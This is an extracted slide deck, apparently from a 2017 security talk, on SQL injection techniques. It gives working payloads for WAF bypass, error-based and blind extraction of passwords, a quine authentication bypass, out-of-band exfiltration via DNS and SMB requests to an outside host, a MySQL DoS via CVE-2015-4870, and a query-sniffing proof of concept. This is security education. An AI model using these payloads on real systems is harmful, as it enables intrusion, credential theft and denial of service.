제목 레이아웃 - PDF Free Download

웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM

SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM

Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya 백수 Jobless

How to find vulnerability? How to exploit vulnerability? Exploit more smartly MITM SQL Injection

What is SQL Injection SELECT * FROM users WHERE name = '" + username + "';

What is SQL Injection SELECT * FROM users WHERE name = FooBar ;

What is SQL Injection SELECT * FROM users WHERE name = 1 OR 1 = 1 ;

Easy to access

NT Web Technology Vulnerabilities

But

Why hard to prevent

How to find sqli vuln?

How about AEG?

How to find sqli vuln?

Indirect SQL Injection

Web Application Firewall 웹어플리케이션을보호할목적으로개발된공격차단솔루션

Web Application Firewall 패턴기반방화벽

Web Application Firewall 패턴기반방화벽 Pattern = or 1 = 1 and 1 = 1 1 = 1

Web Application Firewall 패턴기반방화벽 Pattern = or 1 = 1 or 2 = 2 and 1 = 1 1 = 1

Web Application Firewall 패턴기반방화벽 Pattern = or 1 = 1 and 1 = 1 1 = 1 or 2 = 2

Web Application Firewall 패턴기반방화벽 Pattern = or 1 = 1 or 3 = 3 and 1 = 1 1 = 1 or 2 = 2

Web Application Firewall ASP 에서는 %[00-FF] 범위를초과하면 % 를무시

Web Application Firewall ASP 에서는 %[00-FF] 범위를초과하면 % 를무시?id= UN%ION SE%LECT 1--;

Web Application Firewall ASP 에서는 %[00-FF] 범위를초과하면 % 를무시?id= UN%ION SE%LECT 1--;?id= UNION SELECT 1--;

SQL Injection + DDOS?

How to exploit vulnerability? Classic SQL Injection Blind SQL Injection Error Based SQL Injection Error Based Blind SQL Injection Time Based Blind SQL Injection

Error Based SQL Injection 에러메세지를클라이언트에출력해줄때가능 원하는값을에러메세지에포함시키는기법 DBMS 마다공격방법이다름

Error Based SQL Injection - MSSQL

Error Based SQL Injection - MySQL Duplicate entry XPATH syntax error BIGINT value is out of range in

Error Based SQL Injection - MySQL Duplicate entry 1 group by mid(version(),rand())having min(1)# XPATH syntax error updatexml(0,concat(0xa,version()),0)# BIGINT value is out of range in --~(select*from(select@@version)f)#

Error Based Blind SQL Injection Query 결과값의 True/False 여부를알수없을때사용 에러발생시에예외처리가될때가능

Error Based Blind SQL Injection ascii(substr((select pw from users),1,1))=97

Error Based Blind SQL Injection select(select 96 union select ascii(substr((select pw from users),1,1))) select(select 97 union select ascii(substr((select pw from users),1,1)))

Error Based Blind SQL Injection select(select 96 union select ascii(substr((select pw from users),1,1))) 96,97 return -> error select(select 97 union select ascii(substr((select pw from users),1,1))) 97 return -> no error

Time Based Blind SQL Injection

Time Based Blind SQL Injection MySQL sleep(), benchmark() MSSQL waitfor delay, waitfor time Oracle dbms_lock.sleep()

Compounded SQL Injection SQLi + XSS SQLi + Authentication Bypass Out Of Band SQLi

SQLi + XSS Insert, Update 가가능할경우 Stored XSS 연계 Iframe 태그를통한브라우저 1-Day 공격유행

SQLi + XSS Insert, Update 가가능할경우 Stored XSS 연계 Iframe 태그를통한브라우저 1-Day 공격유행 INSERT INTO board(no,user,<script>evilcode</script>) UPDATE board SET content=<script>evilcode</script>

SQLi + Authentication Bypass Union SQL Injection 재귀적 return 값을통한인증우회

Union SQL Injection Object Injecton SSRF XML External Entity LFI / RFI

재귀적 return 값을통한인증우회

재귀적 return 값을통한인증우회 s = 's = %r\nprint(s%%s)' print(s%s)

재귀적 return 값을통한인증우회 SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine

재귀적 return 값을통한인증우회 if(queryresult) if(queryresult == input) loginsuccess()

재귀적 return 값을통한인증우회?id=asd' union select 1,'admin',REPLACE(@v:='asd\' union select 1,\'admin\',REPLACE(@v:=\'2\',1+1,REPLACE(REPLACE(@v,\ '\\\\\',\'\\\\\\\\\'),\'\\\'\',\'\\\\\\\'\'))-- ',1+1,REPLACE(REPLACE(@v,'\\','\\\\'),'\'','\\\''))--

재귀적 return 값을통한인증우회

Out Of Band SQLi 외부서버로의 Packet 전송 내부네트워크파일접근 SQL 서버에대한 DoS

Out Of Band SQLi DNS Query UTL_HTTP.REQUEST('http://' (select ) '.mydomain'); Access SMB file load_file('\\\\192.168.0.101\\aa');

DBMS 에대한 DoS BENCHMARK() Heavy Query CVE-2015-4870

CVE-2015-4870 select * from information_schema.tables procedure analyse((select*from(select 1)x),1);

Lord of SQL Injection

Exploit more smartly Bitwise operation Blind SQL Injection UPDATE, INSERT Blind SQL Injection without modify data MITM SQL Injection

Blind SQL Injection 의단점 느리다. 로그가많이남는다.

Bitwise operation Blind SQL Injection ascii(substr((select pw from users),1,1))=97

Bitwise operation Blind SQL Injection substr( lpad( bin( ascii(substr((select pw from users),1,1)) ),8,0),1,1) = 1

Bitwise operation Blind SQL Injection substr( lpad( bin( 97 ),8,0),1,1) = 1

Bitwise operation Blind SQL Injection substr( lpad( 1100111,8,0),1,1) = 1

Bitwise operation Blind SQL Injection substr(01100111,1,1) = 1

Bitwise operation Blind SQL Injection substr(lpad(bin( ascii(substr((select pw from users),1,1)) ),7,0),1,1)

MITM SQL Injection Information_schema.processlist.info

Sniff Query? 회원가입 insert into users values( guest123,md5( mypass666 )) 로그인 select...where id= guest123 and pw=md5( mypass666 )

But

직접 Sniffing 하는게너무느리다면 DBMS 에게시키자! BENCHMARK(count,expr) @var_name = expr

SELECT benchmark(9999999, @query:=concat( @query,(select info from information_schema.processlist) ) )

Issues 반복된값을조회할때 Query 의결과값이 cache 됨 select 권한만가지고는 cache 를끌수없음 한번조회된 query 가무수히조회됨

Proof of Concept SELECT @query:=0x3a3a UNION SELECT @tmp:=0x20 UNION SELECT benchmark(500000,(@tmp:= (SELECT Group_concat(info) FROM information_schema.processlist WHERE info NOT LIKE 0x254d49544d5f53514c495f50574e25 or sleep(0)/*mitm_sqli_pwn*/))^(if((@tmp!=0x00)&&(@query NOT LIKE concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)), @query:=concat(@query,replace(@tmp,0x0a,0x5c6e),0x3a3a),0 ))) UNION SELECT @query limit 3,1

Proof of Concept

Tank You RUBIYA805@GMAIL.COM